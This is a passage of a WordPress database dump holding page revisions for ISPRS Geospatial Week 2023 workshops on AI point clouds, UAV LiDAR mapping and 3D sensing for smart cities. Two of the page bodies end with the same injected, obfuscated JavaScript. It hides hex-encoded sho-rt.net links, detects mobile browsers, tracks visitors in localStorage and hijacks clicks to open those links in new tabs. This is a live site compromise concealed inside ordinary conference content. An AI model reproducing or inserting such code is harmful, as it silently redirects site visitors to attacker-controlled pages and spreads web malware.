Institute (FGI), Finland</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"juicy_pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','AI-PC: AI-based Point Cloud and Image Understanding','','inherit','closed','closed','','2577-revision-v1','','','2022-10-07 22:36:51','2022-10-07 22:36:51','',2577,'https://gsw2023.com/?p=2618',0,'revision','',0),
(2619,1,'2022-10-07 22:49:34','2022-10-07 22:49:34','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2575\" img_size=\"230x230\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This workshop will seek contributions covering advanced topics related to the state of the art and future trends in 3D mapping using imaging and LiDAR units onboard Uncrewed Aerial Vehicles (UAVs). The growing interest in 3D mapping using sensing modalities onboard UAVs is motivated by continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning). Among others, solicited papers will cover the following topics: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h5>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"39\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"sky\" style=\"shadow\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_separator border_width=\"5\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Multi-rotor, fixed-wing, and hybrid UAVs</strong></h6>\n</li>\n<li>\n<h6><strong>System calibration</strong></h6>\n</li>\n<li>\n<h6><strong>Georeferencing: direct, indirect, and integrated sensor orientation</strong></h6>\n</li>\n<li>\n<h6><strong>Structure form motion</strong></h6>\n</li>\n<li>\n<h6><strong>Data analytics for LiDAR point clouds</strong></h6>\n</li>\n<li>\n<h6><strong>Visual and LiDAR SLAM</strong></h6>\n</li>\n<li>\n<h6><strong>UAV mapping applications</strong></h6>\n</li>\n<li>\n<h6><strong>UAV mapping in GNSS-challenging/denied environments</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor fusion in support of UAV navigation and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Deep Learning strategies in support UAV mapping activities</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization of UAV data and products</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of UAV data with geospatial data from high-altitude and terrestrial platforms</strong></h6>\n</li>\n<li>\n<h6><strong>Creating benchmark training datasets for deep learning strategies</strong></h6>\n</li>\n<li>\n<h6><strong>Quality assurance and quality control of UAV mapping</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Mohamed Mostafa, Trimble</strong></h6>\n</li>\n<li>\n<h6><strong>Adel Moussa, UofC</strong></h6>\n</li>\n<li>\n<h6><strong>Kai-Wei Cheng, National Cheng Kung University, Taiwan</strong></h6>\n</li>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based mapping with imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','2574-revision-v1','','','2022-10-07 22:49:34','2022-10-07 22:49:34','',2574,'https://gsw2023.com/?p=2619',0,'revision','',0),
(2620,1,'2022-10-07 23:04:42','2022-10-07 23:04:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2583\" img_size=\"322x196\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>High-accuracy and high-efficiency 3D sensing and associated data processing techniques are urgently needed for smart cities. 3D geospatial data acquired by digital photogrammetry and LiDAR systems have become one of the most important data sources to support smart city applications, such as city infrastructure inventory, city planning, urban design, autonomous driving, etc. This workshop will seek contributions covering advanced topics related to the state of the art and future trends of 3D sensing technology and 